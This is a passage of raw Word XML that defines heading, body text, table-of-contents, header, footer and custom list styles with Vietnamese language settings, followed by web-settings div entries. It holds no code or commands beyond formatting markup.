      </w:numPr>
      <w:jc w:val="left"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:i/>
      <w:color w:val="000000" w:themeColor="text1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading4Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00026BE1"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="3"/>
        <w:numId w:val="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26BE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6BE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6BE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6BE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6BE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207"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman Bold" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman Bold" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:caps/>
      <w:kern w:val="0"/>
      <w:sz w:val="26"/>
      <w:lang w:val="vi-VN"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyText">
    <w:name w:val="Body Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BodyTextChar"/>
    <w:rsid w:val="00CB2369"/>
    <w:pPr>
      <w:spacing w:after="120"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii=".VnTime" w:hAnsi=".VnTime"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="BodyTextChar">
    <w:name w:val="Body Text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="BodyText"/>
    <w:rsid w:val="00CB2369"/>
    <w:rPr>
      <w:rFonts w:ascii=".VnTime" w:eastAsia="Times New Roman" w:hAnsi=".VnTime" w:cs="Times New Roman"/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NoSpacing">
    <w:name w:val="No Spacing"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00EB7207"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:caps/>
      <w:kern w:val="0"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
      <w:lang w:val="vi-VN"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00FD7DC1"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cstheme="majorBidi"/>
      <w:b/>
      <w:kern w:val="0"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
      <w:lang w:val="vi-VN"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading3Char">
    <w:name w:val="Heading 3 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading3"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00D70A7B"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cstheme="majorBidi"/>
      <w:b/>
      <w:i/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:kern w:val="0"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="vi-VN"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="ListParagraphChar"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00286039"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Strong">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00201D97"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001B37E5"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HeaderChar">
    <w:name w:val="Header Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Header"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="001B37E5"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:kern w:val="0"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="vi-VN"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001B37E5"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FooterChar">
    <w:name w:val="Footer Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Footer"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="001B37E5"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:kern w:val="0"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="vi-VN"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Bibliography">
    <w:name w:val="Bibliography"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="37"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="000164B9"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOCHeading">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="Heading1"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="003B15FC"/>
    <w:pPr>
      <w:keepLines/>
      <w:numPr>
        <w:numId w:val="0"/>
      </w:numPr>
      <w:spacing w:before="240" w:line="259" w:lineRule="auto"/>
      <w:jc w:val="left"/>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:b w:val="0"/>
      <w:bCs w:val="0"/>
      <w:caps w:val="0"/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003B15FC"/>
    <w:pPr>
      <w:spacing w:after="100"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003B15FC"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="260"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003B15FC"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="520"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003B15FC"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="chuong">
    <w:name w:val="chuong"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="chuongChar"/>
    <w:qFormat/>
    <w:rsid w:val="003F515D"/>
    <w:pPr>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman Bold" w:hAnsi="Times New Roman Bold"/>
      <w:b/>
      <w:bCs/>
      <w:caps/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="chuongChar">
    <w:name w:val="chuong Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="chuong"/>
    <w:rsid w:val="003F515D"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman Bold" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman Bold" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:caps/>
      <w:kern w:val="0"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
      <w:lang w:val="vi-VN"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="listnor">
    <w:name w:val="list_nor"/>
    <w:basedOn w:val="ListParagraph"/>
    <w:link w:val="listnorChar"/>
    <w:qFormat/>
    <w:rsid w:val="00B70927"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="2"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ListParagraphChar">
    <w:name w:val="List Paragraph Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="ListParagraph"/>
    <w:uiPriority w:val="34"/>
    <w:rsid w:val="00B70927"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:kern w:val="0"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="vi-VN"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="listnorChar">
    <w:name w:val="list_nor Char"/>
    <w:basedOn w:val="ListParagraphChar"/>
    <w:link w:val="listnor"/>
    <w:rsid w:val="00B70927"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:kern w:val="0"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="vi-VN"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00AF3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E38B5"/>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7E38B5"/>
    <w:rPr>
      <w:rFonts w:ascii="TimesNewRomanPS-ItalicMT" w:hAnsi="TimesNewRomanPS-ItalicMT" w:hint="default"/>
      <w:b w:val="0"/>
      <w:bCs w:val="0"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="000000"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001430E0"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
      <w:ind w:firstLine="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="24"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="citation-216">
    <w:name w:val="citation-216"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="001430E0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="citation-215">
    <w:name w:val="citation-215"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="001430E0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="button-label">
    <w:name w:val="button-label"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="001430E0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="citation-214">
    <w:name w:val="citation-214"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="001430E0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="citation-213">
    <w:name w:val="citation-213"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="001430E0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="citation-212">
    <w:name w:val="citation-212"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="001430E0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="citation-211">
    <w:name w:val="citation-211"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="001430E0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="citation-210">
    <w:name w:val="citation-210"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="001430E0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="citation-209">
    <w:name w:val="citation-209"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="001430E0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="citation-208">
    <w:name w:val="citation-208"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="001430E0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="citation-207">
    <w:name w:val="citation-207"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="001430E0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="citation-206">
    <w:name w:val="citation-206"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="001430E0"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="Style1">
    <w:name w:val="Style1"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="004F7BA7"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="3"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading4Char">
    <w:name w:val="Heading 4 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading4"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00026BE1"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:kern w:val="0"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="vi-VN"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading5Char">
    <w:name w:val="Heading 5 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading5"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00026BE1"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:kern w:val="0"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="vi-VN"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading6Char">
    <w:name w:val="Heading 6 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading6"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="00026BE1"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="1F3763" w:themeColor="accent1" w:themeShade="7F"/>
      <w:kern w:val="0"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="vi-VN"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading7Char">
    <w:name w:val="Heading 7 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading7"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="00026BE1"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="1F3763" w:themeColor="accent1" w:themeShade="7F"/>
      <w:kern w:val="0"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="vi-VN"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading8Char">
    <w:name w:val="Heading 8 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading8"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="00026BE1"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
      <w:kern w:val="0"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
      <w:lang w:val="vi-VN"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading9Char">
    <w:name w:val="Heading 9 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading9"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="00026BE1"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
      <w:kern w:val="0"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
      <w:lang w:val="vi-VN"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Caption">
    <w:name w:val="caption"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="35"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00D70A7B"/>
    <w:pPr>
      <w:spacing w:before="0" w:after="200" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="44546A" w:themeColor="text2"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00F51078"/>
    <w:pPr>
      <w:spacing w:before="0"/>
      <w:contextualSpacing/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:i/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:spacing w:val="-10"/>
      <w:kern w:val="28"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="56"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="TitleChar">
    <w:name w:val="Title Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Title"/>
    <w:uiPriority w:val="10"/>
    <w:rsid w:val="00F51078"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cstheme="majorBidi"/>
      <w:i/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:spacing w:val="-10"/>
      <w:kern w:val="28"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="56"/>
      <w:lang w:val="vi-VN"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="HTMLCode">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00320CB9"/>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2B4188"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TableofFigures">
    <w:name w:val="table of figures"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001620D1"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTMLPreformatted">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HTMLPreformattedChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00C34454"/>
    <w:pPr>
      <w:spacing w:before="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34454"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
      <w:kern w:val="0"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="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5787">
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1429888080">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="54203765">
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1492722390">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="80566547">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="105471676">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="122113921">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="142357383">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="171115697">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="187066176">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="188371270">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
